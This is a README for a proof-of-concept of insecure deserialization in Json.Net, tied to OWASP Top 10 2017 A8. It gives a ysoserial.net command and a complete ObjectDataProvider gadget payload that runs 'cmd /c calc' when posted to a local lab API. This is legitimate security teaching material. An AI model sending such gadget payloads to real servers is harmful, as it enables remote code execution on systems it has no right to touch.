Insecure deserialization is a severe issue, which allows an attacker to exploit a server just by sending a malicious JSON. This is a new issue in the OWASP Top 10 2017 release - A8. This POC is built based on a white paper from BlackHat USA 2017 talk. You can find a recording of the talk here - this recording is from AppSec USA 2017.

• Use VS to open the solution and launch the server.
• Use curl/postman to send malicious request to the API.

This is an example payload, as generated by ysoserial.net. To generate it, I used the following command: ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc":

{
    "body": {
        "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName": "Start",
        "MethodParameters": {
            "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "$values": [
                "cmd",
                "/c calc"
            ]
        },
        "ObjectInstance": {
            "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
        }
    }
}

Post this payload to http://localhost:8085/api/hello. A new calc instance should be open.